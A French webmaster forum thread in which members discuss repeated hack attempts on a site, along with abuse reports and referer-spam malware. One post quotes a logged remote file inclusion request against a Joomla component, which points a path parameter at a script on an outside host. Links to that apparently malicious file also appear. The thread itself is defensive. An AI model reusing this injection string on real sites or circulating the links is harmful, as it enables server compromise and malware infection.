Tentative de Hack !

bilos

WRInaute impliqué
Salut à tous :)

Méfiez vous de l'adresse ip suivante : ip : [modéré OTP]

C'est un pirate qui ne cesse pas de réaliser des tentatives de hack en XSS :(

Voila le fichier qu'il teste avec -http://www.j-vision.co.kr/company/hotel/index.php/bo.do

Pour ma part je l'ai eu :)

J'ai sécurisé les paramètres qui peuvent passer des intrusions et j'ai placé un piège "alerte email ==> adresse ip , page en question et URL saisie pour pirater le code .

Voilà ce que je viens de recevoir :

Code:
ip : [modéré OTP] sur la page /fr/.../index.php?option=com_noah&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do???

C'est la réécriture des URLs qui m'a sauvé :) il croit que j'utilise joomla :mrgreen:

P.S: Je le trouve encore dans une liste noire :) -http://www.maran.pamil-visions.com/maranxssfilter.php

L'adresse ip est elle un moyen justificatif, si c'est le cas est ce que le log file d'un serveur est tenu en compte ?

Merci pour votre attention
 

biddybulle

WRInaute passionné
Pour avoir été la cible d'un hack bien dissimulé. Je servais de relais également pour envoyer sans le savoir des attaques vers des passoires joomla.

Quand c'est en france, tu es prévenu plus facilement par le Centre d'Expertise gouvernemental de Réponse et de Traitement des Attaques informatiques qui indiquent avec grande précision les pages incriminées et te demandes de les supprimer expréssément et de combler tes failles faute de quoi ...

As tu envoyé un Abuse sur l'ip incriminé ?
 

bilos

WRInaute impliqué
Je reçois la même requête sur une autre adresse [modéré OTP] :(

C'est pas cool !

Je sais bien que j'ai tout sécurisé alors même en cas de dégat mon hébergeur m'offre les backups.

Bon Weekend :)
 

Leonick

WRInaute accro
benachem a dit:
tes liens envoient vers des virus, c'est normal ?
c'est la nouvelle tendance des spams de referer : le webmaster curieux va cliquer pour savoir qui lui a fait un lien et là, sans antivirus à jour, son pc est vérolé :evil:
 

j-mi

WRInaute passionné
mais c'est vraiement honteux de lire un truc comme ça
c vicieux cette pratique
mais pourquoi fourguer des saleté dans les pc des gens
 

Discussions similaires

Haut